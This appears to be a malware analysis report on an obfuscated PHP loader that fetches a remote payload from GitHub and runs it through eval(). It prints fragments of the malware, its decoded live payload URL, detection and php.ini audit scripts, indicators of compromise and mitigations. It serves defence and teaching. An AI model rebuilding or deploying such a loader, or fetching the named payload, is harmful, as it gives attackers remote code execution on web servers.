Malware Analysis Report | PHP Malware Analysis | Obfuscated Remote Loader

SecurityTalent/Malware-Analysis


PHP Malware Analysis: Obfuscated Remote Loader Using GitHub

VirusTotal PHP Malware Analysis

Executive Summary

The PHP script analyzed below is a malicious remote loader (dropper) designed to fetch and execute attacker-controlled PHP code from an external source. While the local file appears small and harmless, it enables full remote code execution (RCE) on the hosting server.

This malware relies on:

  • Heavy string obfuscation
  • Environment capability checks
  • Trusted infrastructure abuse (GitHub raw content)
  • Dynamic execution via eval()

Once deployed, the server is effectively under attacker control.

Threat Classification

| Category | Value |
| --- | --- |
| Malware type | PHP Loader / Webshell Dropper |
| Payload location | Remote (GitHub) |
| Execution method | eval() |
| Obfuscation | String concatenation |
| Persistence | External / attacker-controlled |
| Severity | Critical |

PHP Malware Analysis

Code Overview

At a glance, the file:

  • Builds a hidden URL character-by-character
  • Determines the best method to fetch remote content
  • Downloads a remote PHP payload
  • Executes it directly in memory

The actual malicious logic does not exist locally — it is retrieved at runtime.

Technical Analysis

1. URL Obfuscation

$_u = 'h' . 't' . 't' . 'p' . 's' . ':' . '/' . '/' . 'r' . 'a' . 'w' . '.' . 'g' . 'i' . 't' . 'h' . 'u' . 'b' . 'u' . 's' . 'e' . 'r' . 'c' . 'o' . 'n' . 't' . 'e' . 'n' . 't' . '.' . 'c' . 'o' . 'm' . '/' . 'i' . 'n' . 'd' . 'o' . 'c' . 's' . 'e' . 'c' . '/' . 'f' . 'u' . 'c' . 'k' . '/' . 'r' . 'e' . 'f' . 's' . '/' . 'h' . 'e' . 'a' . 'd' . 's' . '/' . 'm' . 'a' . 'i' . 'n' . '/' . 'v' . '8' . '.' . 'p' . 'h' . 'p';

⚠️ Obfuscated Malware Code

Obfuscated loader source: backup4.php (linked from the original page)

Decoded URL:

https://raw.githubusercontent.com/indocsec/fuck/refs/heads/main/v8.php

⚠️ Malware Code

Remote payload source: v8.php (linked from the original page)

Why this matters:

  • Avoids signature-based detection
  • Prevents easy discovery via static scanning
  • Conceals malicious intent from administrators

Using GitHub raw content allows attackers to:

  • Hide among legitimate traffic
  • Update payloads instantly
  • Bypass reputation-based filters

2. Security Control Bypass (Environment Checks)

ini_get('allow_url_fopen')
function_exists('curl_init')

The malware selects its remote-fetch method at runtime based on the server's PHP configuration.

Fallback logic:

  • file_get_contents() if allow_url_fopen is enabled
  • cURL (curl_init()) if allow_url_fopen is disabled

This significantly increases success across shared hosting environments.

3. Payload Retrieval

Both methods silently download attacker-controlled PHP code. Key traits:

  • No user input required
  • No file written to disk
  • No validation of downloaded content
  • Short timeout to avoid suspicion

This makes detection via file monitoring difficult.

4. Arbitrary Code Execution

eval('?>' . call_user_func($_b64, base64_encode($_out)));

This is the core malicious behavior.

Even though the payload is base64-encoded and immediately decoded again (functionally a no-op), the result is:

Execution of arbitrary PHP code with full server privileges

Impact includes:

  • Webshell deployment
  • Database access
  • Credential theft
  • Spam or phishing hosting
  • Lateral movement

5. Deceptive Error Handling

echo 'Gagal load';

“Gagal load” is Indonesian for “Failed to load”.

This is intentional:

  • Looks like a broken plugin or backup
  • Reduces admin suspicion
  • Delays investigation

Indicators of Compromise (IOCs)

Suspicious PHP Patterns

  • Obfuscated strings using 'a'.'b'.'c'
  • eval() with remote content
  • call_user_func() for common functions
  • Dynamic construction of function names
  • GitHub raw URLs inside PHP
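The URL deobfuscation in section 1 and the pattern list above can be turned into a small static triage scanner. The following Python is an added example, not code from the report or the repository: it joins `'h' . 't' . 't' . 'p'` style chains back into one literal, then checks the decoded source for eval(), remote fetch calls, call_user_func() with a variable function name, environment probes and raw.githubusercontent.com URLs. The two PHP samples it scans are constructed here (EXAMPLE-ORG/EXAMPLE-REPO is a placeholder, not the real payload location), and the thresholds and verdict rules are assumptions chosen for this example.

```python
import re

# Added example (not the report's own code): static triage for the PHP loader pattern.
# A chain of three or more single-quoted literals joined with the PHP '.' operator.
LIT_RE = re.compile(r"'([^'\\]*)'")
CHAIN_RE = re.compile(r"(?:'[^'\\]*'\s*\.\s*){2,}'[^'\\]*'")

# Patterns from the report's "Suspicious PHP Patterns" list, applied to deobfuscated source.
INDICATOR_RES = {
    "eval": re.compile(r"\beval\s*\("),
    "remote_fetch": re.compile(r"\b(?:file_get_contents|curl_init|curl_exec)\s*\("),
    "call_user_func": re.compile(r"\bcall_user_func(?:_array)?\s*\("),
    "dynamic_function_name": re.compile(r"\bcall_user_func(?:_array)?\s*\(\s*\$"),
    "env_probe": re.compile(r"allow_url_fopen|function_exists\s*\(\s*'curl_init'"),
    "github_raw_url": re.compile(r"https?://raw\.githubusercontent\.com/[^\s'\"]+"),
}


def concat_chains(src):
    """Return (raw_chain, joined_string, literal_count) for every literal concat chain."""
    chains = []
    for m in CHAIN_RE.finditer(src):
        parts = LIT_RE.findall(m.group(0))
        chains.append((m.group(0), "".join(parts), len(parts)))
    return chains


def deobfuscate(src):
    """Collapse every 'a' . 'b' . 'c' chain into the single literal 'abc'."""
    return CHAIN_RE.sub(lambda m: "'" + "".join(LIT_RE.findall(m.group(0))) + "'", src)


def scan_php(src, min_chain=6):
    """Triage one PHP source text. A chain counts as obfuscated when it has at least
    `min_chain` literals and every literal is at most two characters long (assumed threshold)."""
    obfuscated = [c for c in concat_chains(src)
                  if c[2] >= min_chain and all(len(p) <= 2 for p in LIT_RE.findall(c[0]))]
    decoded = deobfuscate(src)
    indicators = sorted(name for name, rx in INDICATOR_RES.items() if rx.search(decoded))
    urls = INDICATOR_RES["github_raw_url"].findall(decoded)
    # Verdict rules are an assumption for this example: eval + remote fetch + (hidden URL or
    # obfuscation) is the loader pattern; two indicators or any obfuscation is worth a look.
    if "eval" in indicators and "remote_fetch" in indicators and (urls or obfuscated):
        verdict = "malicious"
    elif obfuscated or len(indicators) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": indicators,
            "obfuscated_chains": len(obfuscated), "decoded_urls": urls}


def php_concat(s):
    """Build the 'h' . 't' . 't' . 'p' form of a string (used only to construct samples)."""
    return " . ".join("'" + ch + "'" for ch in s)


# Constructed sample loader mirroring the report's structure; the org/repo is a placeholder.
SAMPLE_URL = "https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/refs/heads/main/v8.php"
SAMPLE_LOADER = f"""<?php
$_u = {php_concat(SAMPLE_URL)};
$_b64 = {php_concat('base64_decode')};
$_out = '';
if (ini_get('allow_url_fopen')) {{
    $_out = @file_get_contents($_u);
}} elseif (function_exists('curl_init')) {{
    $_c = curl_init($_u); curl_setopt($_c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($_c, CURLOPT_TIMEOUT, 5); $_out = curl_exec($_c); curl_close($_c);
}}
if ($_out) {{ eval('?>' . call_user_func($_b64, base64_encode($_out))); }}
else {{ echo 'Gagal load'; }}
"""

# Constructed benign sample: ordinary string concatenation and a local file read.
SAMPLE_BENIGN = """<?php
$cfg = json_decode(file_get_contents(__DIR__ . '/config.json'), true);
echo 'Hello ' . $cfg['name'] . ', welcome back';
"""

if __name__ == "__main__":
    for label, src in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(src))
```

The benign sample trips only the remote_fetch pattern (file_get_contents is also used for local reads), which is why the scanner reports a verdict rather than a single pattern hit: a file_get_contents() on its own is noise, while eval() combined with a fetch and a reconstructed raw.githubusercontent.com URL is the loader described above.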

Behavioral Indicators

  • Unexpected outbound HTTP(S) requests
  • PHP processes initiating network traffic
  • New PHP files named like backup, cache, old, tmp

Detection Challenges

This malware often shows low antivirus detection rates because:

  • No static payload exists locally
  • The real malware is fetched at runtime
  • Many scanners do not emulate PHP execution
  • GitHub is a trusted domain

A single heuristic detection is the expected outcome here, not a reassuring one.

Mitigation & Response

Immediate Actions

  • Remove the file immediately
  • Assume full server compromise
  • Rotate all credentials, including:
    • Database usernames and passwords
    • FTP / SFTP credentials
    • SSH keys and passwords
  • Inspect web server logs for suspicious outbound HTTP/HTTPS connections
  • Search for similar obfuscation patterns across the codebase (string concatenation, eval(), call_user_func())

Hardening Recommendations

  • Disable allow_url_fopen in php.ini
  • Restrict or fully disable use of eval()
  • Enforce open_basedir restrictions
  • Monitor outbound network traffic from the web server
  • Deploy File Integrity Monitoring (FIM) to detect unauthorized file changes
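The php.ini side of the hardening list can be checked mechanically. The following Python is an added example, not code from the report: it reads a php.ini text and reports which of the enforceable settings are still weak, with a constructed weak configuration beside its corrected form. Two caveats a practitioner will want: eval() is a PHP language construct rather than a function, so it cannot be switched off through disable_functions, which is why the audit checks only settings php.ini can actually enforce; and allow_url_include is included here as a closely related setting the report does not list (it governs include/require of remote URLs and defaults to Off).

```python
import re

# Added example (not the report's own code): audit a php.ini text against the
# hardening points that php.ini can enforce. allow_url_include is an addition
# beyond the report's list; the sample ini files below are constructed.

TRUE_WORDS = {"1", "on", "true", "yes"}


def ini_bool(value):
    """Interpret a php.ini boolean the way PHP does: On/True/Yes/1 are true, anything else false."""
    return value.strip().strip("\"'").lower() in TRUE_WORDS


def parse_php_ini(text):
    """Minimal php.ini reader: drops ; comments and [sections], returns {key: value}.
    Values are unquoted; a ';' inside a quoted value is not handled (kept simple on purpose)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # strip full-line and inline ; comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip("\"'")
    return settings


# (setting, acceptable(value) where None means "not present, PHP default applies", recommendation)
CHECKS = [
    # allow_url_fopen defaults to On, so an absent key is still a finding
    ("allow_url_fopen", lambda v: v is not None and not ini_bool(v), "Off"),
    # allow_url_include defaults to Off, so absent is fine; On is never acceptable
    ("allow_url_include", lambda v: v is None or not ini_bool(v), "Off"),
    # open_basedir is empty by default; any non-empty restriction is accepted
    ("open_basedir", lambda v: bool(v), "/var/www/html:/tmp (restrict to the web root)"),
]


def audit_php_ini(text):
    """Return findings as (setting, current_value, recommended_value) tuples; empty means hardened."""
    settings = parse_php_ini(text)
    findings = []
    for name, acceptable, recommended in CHECKS:
        current = settings.get(name)
        if not acceptable(current):
            shown = current if current is not None else "<unset: PHP default>"
            findings.append((name, shown, recommended))
    return findings


WEAK_INI = """; constructed sample: common shared-hosting defaults
[PHP]
allow_url_fopen = On
allow_url_include = On ; should never be on
; open_basedir is not set at all
"""

HARDENED_INI = """; constructed sample: corrected settings
[PHP]
allow_url_fopen = Off
allow_url_include = Off
open_basedir = "/var/www/html:/tmp"
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit_php_ini(ini) or "no findings")
```

Run it against the real php.ini of a suspect host (`php --ini` shows which file is loaded); a site that genuinely needs remote fopen should get it through an explicit cURL call in reviewed code rather than a global allow_url_fopen, and the loader above is exactly the case open_basedir exists to contain.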

Why This Malware Is Effective

  • Minimal on-disk footprint
  • No local payload stored on the server
  • Abuse of trusted infrastructure (e.g., GitHub raw content)
  • Simple but highly reliable execution logic
  • Highly effective on low-cost shared hosting environments

This is not noisy malware — it is intentionally designed for stealth and long-term persistence.

📌 Hacker Account / Tool Repository

⚠️ SECURITY WARNING

This repository contains a PHP web shell / file manager (CSEC Shell 0.8) that provides powerful server‑side capabilities such as file access, command execution, and system control.

Do NOT deploy this on production or third‑party systems. Use only for educational, forensic analysis, or on servers you fully own and control.

Misuse of this code may lead to server compromise, data loss, or legal consequences.

🔗 The attacker's GitHub account / tool repository is linked from the original page.
